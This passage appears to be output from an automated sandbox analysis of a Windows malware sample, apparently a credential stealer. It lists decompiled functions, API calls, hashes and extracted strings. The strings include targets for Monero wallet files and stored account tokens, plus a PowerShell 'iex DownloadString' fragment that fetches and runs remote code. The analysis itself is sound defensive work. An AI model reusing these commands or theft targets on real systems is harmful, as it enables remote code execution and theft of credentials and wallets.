                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuetask
                              • String ID: Password
                              • API String ID: 775622407-3434357891
                              • Opcode ID: 7904713cdfb2b33bf8b0ef49feeebec1b0be5d99e7b650212932d70f2b7dbfd3
                              • Instruction ID: bbd3b5fba8843f8396415d43c34b9627c39003ed8ef6b7c59b31570395dd9d04
                              • Opcode Fuzzy Hash: 7904713cdfb2b33bf8b0ef49feeebec1b0be5d99e7b650212932d70f2b7dbfd3
                              • Instruction Fuzzy Hash: 5F614AB1C0422C9BDB24DB50DC85BEAB7B8BF44300F0081E9E689A6155DFB45BC9DFA0
                              Function 00FFBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                              • lstrlen.KERNEL32(00000000), ref: 00FFBC9F
                                • Part of subcall function 01008E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01008E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00FFBCCD
                              • lstrlen.KERNEL32(00000000), ref: 00FFBDA5
                              • lstrlen.KERNEL32(00000000), ref: 00FFBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: 387507b44bf6b733fae74ed5eb54ec93b9e05f3616ff5937bae6597d95f9dbfd
                              • Instruction ID: f4eeb946e5e4fa5610864e2e1d1c07fe88225202b3e7effc3162a023b212ece7
                              • Opcode Fuzzy Hash: 387507b44bf6b733fae74ed5eb54ec93b9e05f3616ff5937bae6597d95f9dbfd
                              • Instruction Fuzzy Hash: 41B12071A10209DBEF19FBA0DD95EEE7338AF64200F404169E587A71D4EF346B49CBA1
                              Function 01006770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: *
                              • API String ID: 1494266314-163128923
                              • Opcode ID: 7ac94bac53d01c688e2017e427850d36c7d1915662c4dba8f6b01d9bc31d27c4
                              • Instruction ID: 4298eb0d20691d9d0ba766b3faa7765e293050cfd16054e2b3be344ed49e413e
                              • Opcode Fuzzy Hash: 7ac94bac53d01c688e2017e427850d36c7d1915662c4dba8f6b01d9bc31d27c4
                              • Instruction Fuzzy Hash: 5CF05E30904309EFD3699FE0F54D76C7B70FB04703F0401A8E68AC7284E6754B519B95
                              Function 00FF4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00FF4FCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FF4FD1
                              • InternetOpenA.WININET(01010DDF,00000000,00000000,00000000,00000000), ref: 00FF4FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00FF5011
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00FF5041
                              • InternetCloseHandle.WININET(?), ref: 00FF50B9
                              • InternetCloseHandle.WININET(?), ref: 00FF50C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: f2b3101b10cdde3cc0ae18f623b4822bd254e489cb2ed458aeae13a8e302acba
                              • Instruction ID: 468b4ee12724d5d22e37ccfdfa37e6688085c8df8a4c0ba4e33b2148359a7c2c
                              • Opcode Fuzzy Hash: f2b3101b10cdde3cc0ae18f623b4822bd254e489cb2ed458aeae13a8e302acba
                              • Instruction Fuzzy Hash: 1C31F9B5A4021CABDB24CF54DC89BDCB7B4EB48704F5081E9E709A7284CB706EC59F98
                              Function 010083DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 01008426
                              • wsprintfA.USER32 ref: 01008459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0100847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0100848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 01008499
                                • Part of subcall function 0100A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0100A7E6
                              • RegQueryValueExA.ADVAPI32(00000000,0198F718,00000000,000F003F,?,00000400), ref: 010084EC
                              • lstrlen.KERNEL32(?), ref: 01008501
                              • RegQueryValueExA.ADVAPI32(00000000,0198F700,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,01010B34), ref: 01008599
                              • RegCloseKey.ADVAPI32(00000000), ref: 01008608
                              • RegCloseKey.ADVAPI32(00000000), ref: 0100861A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: e441679ccbfcdf54b2c08c9eafcff5e0371b3efd0125a1bf3969f03f0857d80f
                              • Instruction ID: 5a2a0d8cf624b58e3916b473f6e6871f198854a4adaedb5e4f732de3c0c507a0
                              • Opcode Fuzzy Hash: e441679ccbfcdf54b2c08c9eafcff5e0371b3efd0125a1bf3969f03f0857d80f
                              • Instruction Fuzzy Hash: 05210A71A102189BEB64DB54DC84FE9B3B8FB48700F00C5E9A649A7280DF716A85CFD4
                              Function 01007690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 010076A4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 010076AB
                              • RegOpenKeyExA.ADVAPI32(80000002,0197BAB0,00000000,00020119,00000000), ref: 010076DD
                              • RegQueryValueExA.ADVAPI32(00000000,0198F730,00000000,00000000,?,000000FF), ref: 010076FE
                              • RegCloseKey.ADVAPI32(00000000), ref: 01007708
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: c4697080fa8afc87dd1e802cdfeb47c80ef2fb8fc63cdf6df6118d079d176713
                              • Instruction ID: 9422f9ff86771607a50d68dc9e78a26e5c05369905961f7145a8417f863d8390
                              • Opcode Fuzzy Hash: c4697080fa8afc87dd1e802cdfeb47c80ef2fb8fc63cdf6df6118d079d176713
                              • Instruction Fuzzy Hash: 1F014FB5A00208BBE711DBE4EC4DFADB7B8EB48701F0040A8FB85D72C4D674A9048B50
                              Function 01007720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 01007734
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0100773B
                              • RegOpenKeyExA.ADVAPI32(80000002,0197BAB0,00000000,00020119,010076B9), ref: 0100775B
                              • RegQueryValueExA.ADVAPI32(010076B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0100777A
                              • RegCloseKey.ADVAPI32(010076B9), ref: 01007784
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 006a5fd4a4e48b0fff71151b28b2eb9399afcc3df677d91a4205d43e850d35b6
                              • Instruction ID: 9c2f1ceb2be14d52e05f7e1d88931ac7edfa4ce094b066dedb090f90778df5d9
                              • Opcode Fuzzy Hash: 006a5fd4a4e48b0fff71151b28b2eb9399afcc3df677d91a4205d43e850d35b6
                              • Instruction Fuzzy Hash: 810167B5A40308BBE710DBE4EC4DFAEB7B8FB48700F004159FA45E7285D6745500CB51
                              Function 00FF99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FF99EC
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00FF9A11
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FF9A31
                              • ReadFile.KERNEL32(000000FF,?,00000000,00FF148F,00000000), ref: 00FF9A5A
                              • LocalFree.KERNEL32(00FF148F), ref: 00FF9A90
                              • CloseHandle.KERNEL32(000000FF), ref: 00FF9A9A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 5387ae745010a2fcc55516c6200f1032a0b75d5e28a66e2ba0a8d2afa8164428
                              • Instruction ID: d0803c5f1202ec73f86bee49c2a8025725623b556adef414c12d3b8603394de6
                              • Opcode Fuzzy Hash: 5387ae745010a2fcc55516c6200f1032a0b75d5e28a66e2ba0a8d2afa8164428
                              • Instruction Fuzzy Hash: 8131E9B4E0020DEFDB24CF94D989BAE77B5FF48350F108158E912A7294D778AA41DFA1
                              Function 01004780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0198F280), ref: 010047DB
                                • Part of subcall function 01008DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01008E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 01004801
                              • lstrcat.KERNEL32(?,?), ref: 01004820
                              • lstrcat.KERNEL32(?,?), ref: 01004834
                              • lstrcat.KERNEL32(?,0197A890), ref: 01004847
                              • lstrcat.KERNEL32(?,?), ref: 0100485B
                              • lstrcat.KERNEL32(?,0198E2F0), ref: 0100486F
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 01008D90: GetFileAttributesA.KERNEL32(00000000,?,00FF1B54,?,?,0101564C,?,?,01010E1F), ref: 01008D9F
                                • Part of subcall function 01004570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 01004580
                                • Part of subcall function 01004570: RtlAllocateHeap.NTDLL(00000000), ref: 01004587
                                • Part of subcall function 01004570: wsprintfA.USER32 ref: 010045A6
                                • Part of subcall function 01004570: FindFirstFileA.KERNEL32(?,?), ref: 010045BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_ff0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 5624c974c383c2d31712abee821291d480a897e7a2cda56e029404eb505ed7c7
                              • Instruction ID: 030347999cd37539847f30052e62e7525b47f3ba6de0461af9bc21eca7708825
                              • Opcode Fuzzy Hash: 5624c974c383c2d31712abee821291d480a897e7a2cda56e029404eb505ed7c7
                              • Instruction Fuzzy Hash: 84317FB2D00218A7DB21FBB0DC88EE9737CBB68700F444599A39997080EA74D7898B95
                              Function 01002C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0100A740: lstrcpy.KERNEL32(01010E17,00000000), ref: 0100A788
                                • Part of subcall function 0100A9B0: lstrlen.KERNEL32(?,01988C20,?,\Monero\wallet.keys,01010E17), ref: 0100A9C5
                                • Part of subcall function 0100A9B0: lstrcpy.KERNEL32(00000000), ref: 0100AA04
                                • Part of subcall function 0100A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0100AA12
                                • Part of subcall function 0100A920: lstrcpy.KERNEL32(00000000,?), ref: 0100A972
                                • Part of subcall function 0100A920: lstrcat.KERNEL32(00000000), ref: 0100A982
                                • Part of subcall function 0100A8A0: lstrcpy.KERNEL32(?,01010E17), ref: 0100A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 01002D85
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 01002CC4
                              • ')", xrefs: 01002CB3
                              • <, xrefs: 01002D39
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 01002D04
                              Memory Dump Source
                              • Source File: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                              • Associated: 00000000.00000002.2168421375.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.00000000010D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168434293.000000000123A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.000000000124E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000013D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168569157.00000000014EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168828643.00000000014EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168925152.0000000001686000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2168940818.0000000001687000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
